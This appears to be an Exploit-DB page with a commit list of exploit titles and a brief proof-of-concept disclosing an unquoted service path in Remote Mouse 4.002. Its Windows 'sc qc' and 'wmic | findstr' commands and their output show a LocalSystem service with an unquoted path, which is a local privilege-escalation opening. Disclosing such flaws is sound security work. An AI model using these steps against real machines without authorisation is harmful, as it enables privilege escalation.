16b24da825
19 changes to exploits/shellcodes Omnia MPX 1.5.0+r1 - Path Traversal Easy Chat Server 3.1 - Remote Stack Buffer Overflow (SEH) OctoBot WebInterface 0.4.3 - Remote Code Execution (RCE) Wavlink WN533A8 - Cross-Site Scripting (XSS) Wavlink WN530HG4 - Password Disclosure Wavlink WN533A8 - Password Disclosure WordPress Plugin Duplicator 1.4.6 - Unauthenticated Backup Download WordPress Plugin Duplicator 1.4.7 - Information Disclosure CuteEditor for PHP 6.6 - Directory Traversal mPDF 7.0 - Local File Inclusion NanoCMS v0.4 - Remote Code Execution (RCE) (Authenticated) Webmin 1.996 - Remote Code Execution (RCE) (Authenticated)
26 lines
No EOL
1.1 KiB
Text
26 lines
No EOL
1.1 KiB
Text
# Exploit Title: Remote Mouse 4.002 - Unquoted Service Path
|
|
# Exploit Author: Salman Asad (@deathflash1411) a.k.a LeoBreaker
|
|
# Date: 03.09.2021
|
|
# Software Link: https://www.remotemouse.net/downloads/RemoteMouse.exe
|
|
# Vendor Homepage: https://www.remotemouse.net/
|
|
# Version: Remote Mouse 3.008 & 4.002
|
|
# Tested on: Windows 10
|
|
|
|
# Proof of Concept:
|
|
|
|
C:\Users\death>sc qc RemoteMouseService
|
|
[SC] QueryServiceConfig SUCCESS
|
|
|
|
SERVICE_NAME: RemoteMouseService
|
|
TYPE : 10 WIN32_OWN_PROCESS
|
|
START_TYPE : 2 AUTO_START
|
|
ERROR_CONTROL : 1 NORMAL
|
|
BINARY_PATH_NAME : C:\Program Files (x86)\Remote Mouse\RemoteMouseService.exe
|
|
LOAD_ORDER_GROUP :
|
|
TAG : 0
|
|
DISPLAY_NAME : RemoteMouseService
|
|
DEPENDENCIES :
|
|
SERVICE_START_NAME : LocalSystem
|
|
|
|
C:\Users\death>cmd /c wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """
|
|
RemoteMouseService RemoteMouseService C:\Program Files (x86)\Remote Mouse\RemoteMouseService.exe Auto |